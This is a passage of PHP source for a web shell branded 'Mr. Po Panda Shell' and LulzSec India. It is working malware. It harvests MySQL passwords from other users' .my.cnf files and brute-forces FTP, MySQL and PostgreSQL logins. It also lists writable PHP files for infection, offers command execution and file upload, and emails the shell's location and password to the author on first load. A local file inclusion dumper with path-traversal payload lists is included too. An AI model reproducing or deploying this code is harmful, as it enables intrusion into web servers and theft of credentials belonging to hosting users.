  588. $count=1;
  589. $dc = 0;
  590. $list = scandir("/var/named");
  591. foreach($list as $domain){
  592. if(strpos($domain,".db")){
  593. $domain = str_replace('.db','',$domain);
  594. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  595. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  596. $path = getcwd();
  597.  
  598. if (is_readable($dirz)) {
  599. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  600. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  601. $password=entre2v2($p,'password="','"');
  602. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  603. $dc++;
  604. }
  605.  
  606. }
  607. }
  608. echo '</table>';
  609. $total = $dc;
  610. echo '<br><div class="result">Total Found = '.$total.'</h3><br />';
  611. echo '</center>';
  612. }else{
  613. $d0mains = @file('/etc/named.conf');
  614.     if($d0mains) {
  615. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  616. $count=1;
  617. $dc = 0;
  618. $mck = array();
  619. foreach($d0mains as $d0main){
  620.     if(@eregi('zone',$d0main)){
  621.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  622.         flush();
  623.         if(strlen(trim($domain[1][0])) >2){
  624.             $mck[] = $domain[1][0];
  625.         }
  626.     }
  627. }
  628. $mck = array_unique($mck);
  629. $usr = array();
  630. $dmn = array();
  631. foreach($mck as $o) {
  632.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  633.     $usr[] = $infos['name'];
  634.     $dmn[] = $o;
  635. }
  636. array_multisort($usr,$dmn);
  637. $dt = file('/etc/passwd');
  638. $passwd = array();
  639. foreach($dt as $d) {
  640.     $r = explode(':',$d);
  641.     if(strpos($r[5],'home')) {
  642.         $passwd[$r[0]] = $r[5];
  643.     }
  644. }
  645. $l=0;
  646. $j=1;
  647. foreach($usr as $r) {
  648. $dirz = '/home/'.$r.'/.my.cnf';
  649. $path = getcwd();
  650. if (is_readable($dirz)) {
  651. copy($dirz, ''.$path.'/'.$r.'.txt');
  652. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  653. $password=entre2v2($p,'password="','"');
  654. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  655. $dc++;
  656.                 flush();
  657.                 $l=$l?0:1;
  658.                 $j++;
  659.                                 }
  660.             }
  661.                         }
  662. echo '</table>';
  663. $total = $dc;
  664. echo '<br><div class="result">Total Found = '.$total.'</h3><br />';
  665. echo '</center>';
  666.  
  667. }
  668. }else{
  669. echo "<h3><div class='result'><i><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>ERROR</font><br><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>/var/named</font> or <font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>etc/named.conf</font> Not Accessible!</i></div></h3>";
  670. echo "<h3><div class='result'><i><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>Lulzsec India </font></h3>";
  671.  
  672. }
  673.   printFooter();
  674.  }
  675.  
  676. function actionBruteforce() {
  677.     printHeader();
  678.     if( isset($_POST['proto']) ) {
  679.         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  680.         if( $_POST['proto'] == 'ftp' ) {
  681.             function bruteForce($ip,$port,$login,$pass) {
  682.                 $fp = @ftp_connect($ip, $port?$port:21);
  683.                 if(!$fp) return false;
  684.                 $res = @ftp_login($fp, $login, $pass);
  685.                 @ftp_close($fp);
  686.                 return $res;
  687.             }
  688.         } elseif( $_POST['proto'] == 'mysql' ) {
  689.             function bruteForce($ip,$port,$login,$pass) {
  690.                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  691.                 @mysql_close($res);
  692.                 return $res;
  693.             }
  694.         } elseif( $_POST['proto'] == 'pgsql' ) {
  695.             function bruteForce($ip,$port,$login,$pass) {
  696.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  697.                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  698.                 @pg_close($res);
  699.                 return $res;
  700.             }
  701.         }
  702.         $success = 0;
  703.         $attempts = 0;
  704.         $server = explode(":", $_POST['server']);
  705.         if($_POST['type'] == 1) {
  706.             $temp = @file('/etc/passwd');
  707.             if( is_array($temp) )
  708.                 foreach($temp as $line) {
  709.                     $line = explode(":", $line);
  710.                     ++$attempts;
  711.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  712.                         $success++;
  713.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  714.                     }
  715.                     if(@$_POST['reverse']) {
  716.                         $tmp = "";
  717.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  718.                             $tmp .= $line[0][$i];
  719.                         ++$attempts;
  720.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  721.                             $success++;
  722.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  723.                         }
  724.                     }
  725.                 }
  726.         } elseif($_POST['type'] == 2) {
  727.             $temp = @file($_POST['dict']);
  728.             if( is_array($temp) )
  729.                 foreach($temp as $line) {
  730.                     $line = trim($line);
  731.                     ++$attempts;
  732.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  733.                         $success++;
  734.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  735.                     }
  736.                 }
  737.         }
  738.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  739.     }
  740.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  741.         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  742.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  743.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  744.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  745.         .'<span>Server:port</span></td>'
  746.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  747.         .'<tr><td><span>Brute type</span></td>'
  748.         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  749.         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> LulzSec)</label></td></tr>'
  750.         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  751.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  752.         .'<td><input type=text name=login value="LulzSec"></td></tr>'
  753.         .'<tr><td><span>Dictionary</span></td>'
  754.         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  755.         .'</td></tr><tr><td></td><td><input type=submit value="Do it Lulz"></td></tr></form></table>';
  756.     echo '</div><br>';
  757.     printFooter();
  758. }
  759.  
  760.                                                            
  761. function actionInfect() {
  762.                                                                     printHeader();
  763.                                                                     echo '<h1>Infect</h1><div class=content>';
  764.                                                                     if ($_POST['p1'] == 'infect') {
  765.                                                                         $target = $_SERVER['DOCUMENT_ROOT'];
  766.                                                                         function ListFiles($dir) {
  767.                                                                             if ($dh = opendir($dir)) {
  768.                                                                                 $files = Array();
  769.                                                                                 $inner_files = Array();
  770.                                                                                 while ($file = readdir($dh)) {
  771.                                                                                     if ($file != "." && $file != "..") {
  772.                                                                                         if (is_dir($dir . "/" . $file)) {
  773.                                                                                             $inner_files = ListFiles($dir . "/" . $file);
  774.                                                                                             if (is_array($inner_files)) $files = array_merge($files, $inner_files);
  775.                                                                                         } else {
  776.                                                                                             array_push($files, $dir . "/" . $file);
  777.                                                                                         }
  778.                                                                                     }
  779.                                                                                 }
  780.                                                                                 closedir($dh);
  781.                                                                                 return $files;
  782.                                                                             }
  783.                                                                         }
  784.                                                                         foreach (ListFiles($target) as $key => $file) {
  785.                                                                             $nFile = substr($file, -4, 4);
  786.                                                                             if ($nFile == ".php") {
  787.                                                                                 if (($file <> $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF']) && (is_writeable($file))) {
  788.                                                                                     echo "$file<br>";
  789.                                                                                     $i++;
  790.                                                                                 }
  791.                                                                             }
  792.                                                                         }
  793.                                                                         echo "<font color=red size=14>$i</font>";
  794.                                                                     } else {
  795.                                                                         echo "<form method=post><input type=submit value=Infect name=infet></form>";
  796.                                                                         echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  797.                                                                     }
  798.                                                                    printFooter();
  799.                                                                 }
  800.                                                            
  801.  
  802.  
  803. function printFooter() {
  804.     $is_writable = is_writable($GLOBALS['cwd'])?"<font color=aqua>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  805. echo '</div><div style="margin:1px;background:#000;"><div class="content" style="border-top:1px  #56A3E9;">
  806. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
  807.     <tr>
  808.         <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
  809.         <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
  810.     </tr>
  811.     <tr>
  812.         <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
  813.         <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  814.     </tr>
  815.     <tr>
  816.         <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
  817.         <td><form method="post" ENCTYPE="multipart/form-data">
  818.         <input type=hidden name=a value="FilesMAn">
  819.         <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  820.         <input type=hidden name=p1 value="uploadFile">
  821.         <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  822.         <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
  823.     </tr>
  824. </table></div></div>
  825. <div style="margin:5px;background:#000;"><div class="content" style="border-top:1px  #56A3E9;text-align:center;font-weight:bold;"><font color="#2052ff">Mr. Po Panda  Shell '.VERSION.'<br>WE ARE: <marquee width="50%"> LulzSec india </marquee></font></div></div>
  826. </div>
  827. </body></html>';
  828. }
  829. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  830. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  831.  
  832. if(!isset($_SESSION['trimite'])){
  833.     $url=" IP: ".gethostbyname($_SERVER["HTTP_HOST"]);
  834.     $to="popanda1337@gmail.com";
  835. $subject = "Shell 4.0 Uploaded";
  836. $header = "from: New Shell";
  837. $message = " link : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n";
  838. "User IP: ".$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');
  839.  
  840. $message.="Path :"._file_;
  841. $message.="Pass :".$auth_pass;
  842. $sentmail = @mail($to,$subject,$message,$header);
  843.  
  844.  
  845.    
  846. }
  847. function viewSize($s) {
  848.     if($s >= 1073741824)
  849.         return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  850.     elseif($s >= 1048576)
  851.         return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  852.     elseif($s >= 1024)
  853.         return sprintf('%1.2f', $s / 1024 ) . ' KB';
  854.     else
  855.         return $s . ' B';
  856. }
  857. function perms($p) {
  858.     if (($p & 0xC000) == 0xC000)$i = 's';
  859.     elseif (($p & 0xA000) == 0xA000)$i = 'l';
  860.     elseif (($p & 0x8000) == 0x8000)$i = '-';
  861.     elseif (($p & 0x6000) == 0x6000)$i = 'b';
  862.     elseif (($p & 0x4000) == 0x4000)$i = 'd';
  863.     elseif (($p & 0x2000) == 0x2000)$i = 'c';
  864.     elseif (($p & 0x1000) == 0x1000)$i = 'p';
  865.     else $i = 'u';
  866.     $i .= (($p & 0x0100) ? 'r' : '-');
  867.     $i .= (($p & 0x0080) ? 'w' : '-');
  868.     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  869.     $i .= (($p & 0x0020) ? 'r' : '-');
  870.     $i .= (($p & 0x0010) ? 'w' : '-');
  871.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  872.     $i .= (($p & 0x0004) ? 'r' : '-');
  873.     $i .= (($p & 0x0002) ? 'w' : '-');
  874.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  875.     return $i;
  876. }
  877. function viewPermsColor($f) {
  878.     if (!@is_readable($f))
  879.         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  880.     elseif (!@is_writable($f))
  881.         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  882.     else
  883.         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  884. }
  885. if(!function_exists("scandir")) {
  886.     function scandir($dir) {
  887.         $dh  = opendir($dir);
  888.         while (false !== ($filename = readdir($dh))) {
  889.             $files[] = $filename;
  890.         }
  891.         return $files;
  892.     }
  893. }
  894. function actionSecInfo() {
  895.     printHeader();
  896.     echo ' <span style="color:White;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size: 50pt;"> <h1>Server security information By LulzSec </h1><h1> LulzSec India </h1><div class=content>';
  897.     function showSecParam($n, $v) {
  898.         $v = trim($v);
  899.         if($v) {
  900.             echo '<span>'.$n.': </span>';
  901.             if(strpos($v, "\n") === false)
  902.                 echo $v.'<br>';
  903.             else
  904.                 echo '<pre class=ml1>'.$v.'</pre>';
  905.         }
  906.     }
  907.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  908.     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  909.     showSecParam('Open base dir', @ini_get('open_basedir'));
  910.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  911.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  912.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  913.     $temp=array();
  914.     if(function_exists('mysql_get_client_info'))
  915.         $temp[] = "MySql (".mysql_get_client_info().")";
  916.     if(function_exists('mssql_connect'))
  917.         $temp[] = "MSSQL";
  918.     if(function_exists('pg_connect'))
  919.         $temp[] = "PostgreSQL";
  920.     if(function_exists('oci_connect'))
  921.         $temp[] = "Oracle";
  922.     showSecParam('Supported databases', implode(', ', $temp));
  923.     echo '<br>';
  924.     if( $GLOBALS['os'] == 'nix' ) {
  925.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  926.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  927.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  928.         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  929.         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  930.         showSecParam('OS version', @file_get_contents('/proc/version'));
  931.         showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  932.         if(!$GLOBALS['safe_mode']) {
  933.             echo '<br>';
  934.             $temp=array();
  935.             foreach ($userful as $item)
  936.                 if(which($item)){$temp[]=$item;}
  937.             showSecParam('Userful', implode(', ',$temp));
  938.             $temp=array();
  939.             foreach ($danger as $item)
  940.                 if(which($item)){$temp[]=$item;}
  941.             showSecParam('Danger', implode(', ',$temp));
  942.             $temp=array();
  943.             foreach ($downloaders as $item)
  944.                 if(which($item)){$temp[]=$item;}
  945.             showSecParam('Downloaders', implode(', ',$temp));
  946.             echo '<br/>';
  947.             showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  948.             showSecParam('HDD space', ex('df -h'));
  949.             showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  950.         }
  951.     } else {
  952.         showSecParam('OS Version',ex('ver'));
  953.         showSecParam('Account Settings',ex('net accounts'));
  954.         showSecParam('User Accounts',ex('net user'));
  955.     }
  956.     echo '</div>';
  957.     printFooter();
  958. }
  959.  
  960. function actionlfiscan() {
  961.         printHeader();
  962.         print '
  963.        <h3>LFI File dumper By LulzSec</h3>
  964.      
  965.        <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
  966.           LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
  967.              <option value="1">
  968.                 Access Log
  969.              </option>
  970.      
  971.              <option value="2">
  972.                 httpd.conf
  973.              </option>
  974.      
  975.              <option value="3">
  976.                 Error Log
  977.              </option>
  978.              <option value="4">
  979.                 php.ini
  980.              </option>
  981.              <option value="5">
  982.                 MySQL
  983.              </option>
  984.              <option value="6">
  985.                 FTP
  986.              </option>
  987.              <option value="7">
  988.                 Environ
  989.              </option>
  990.           </select> Null: <select name="null">
  991.              <option value="%00">
  992.                 Yes
  993.              <option value="">
  994.                 No
  995.              </option>
  996.           </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
  997.        </form>';
  998.        error_reporting(0);
  999.           if($_POST['lfiurl']) {
  1000.              print "<pre>";
  1001.              $cheader = $_POST['custom_header'];
  1002.              $target = $_POST['lfiurl'];
  1003.              $type = $_POST['scantype'];
  1004.              $byte1 = $_POST['null'];
  1005.              $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
  1006.              $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
  1007.              $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
  1008.              $lfiaccess = array(
  1009.                 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
  1010.                 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
  1011.                 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
  1012.                 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
  1013.                 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
  1014.                 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
  1015.                 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
  1016.                 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
  1017.                 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
  1018.                 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
  1019.                 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
  1020.                 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
  1021.                 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
  1022.                 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
  1023.                 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
  1024.                 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
  1025.                 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
  1026.                 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
  1027.                 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
  1028.                 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
  1029.                 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
  1030.                 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
  1031.                 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
  1032.            
  1033.              $lfierror = array(
  1034.                 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
  1035.                 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
  1036.                 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
  1037.                 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
  1038.                 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
  1039.                 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
  1040.                 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
  1041.                 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
  1042.                 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
  1043.                 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
  1044.                 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
  1045.                 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
  1046.                 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
  1047.                 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
  1048.                 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
  1049.                 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
  1050.                 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
  1051.                 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
  1052.                 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
  1053.                 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
  1054.                 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
  1055.                 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
  1056.                 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
  1057.      
  1058.              $lficonfig = array(
  1059.                 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
  1060.                 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
  1061.                 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
  1062.                 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
  1063.                 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
  1064.                 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
  1065.                 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
  1066.                 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
  1067.                 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
  1068.                 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
  1069.                 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
  1070.                 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
  1071.                 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
  1072.                 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
  1073.                 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
  1074.                 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
  1075.                 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
  1076.                 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
  1077.                 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
  1078.                 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
  1079.                 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
  1080.                 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
  1081.                 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
  1082.                 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
  1083.                 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
  1084.                 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
  1085.                 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
  1086.                 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
  1087.                 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
  1088.                 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
  1089.                 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
  1090.                 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
  1091.                 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
  1092.                 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
  1093.                 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
  1094.                    
  1095.               $lfiphpini = array(
  1096.                 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
  1097.                 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
  1098.                 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
  1099.                 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
  1100.                 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
  1101.                 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
  1102.                 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
  1103.                 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
  1104.                 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
  1105.                 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
  1106.                 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
  1107.                 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
  1108.                 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
  1109.                 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
  1110.                 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
  1111.                 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
  1112.                 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
  1113.                 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
  1114.                 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
  1115.                 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
  1116.                 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
  1117.                 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
  1118.                 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
  1119.                 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
  1120.                 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
  1121.                 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
  1122.                 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
  1123.            
  1124.               $lfimysql = array(
  1125.                 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
  1126.                 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
  1127.                 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
  1128.                 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
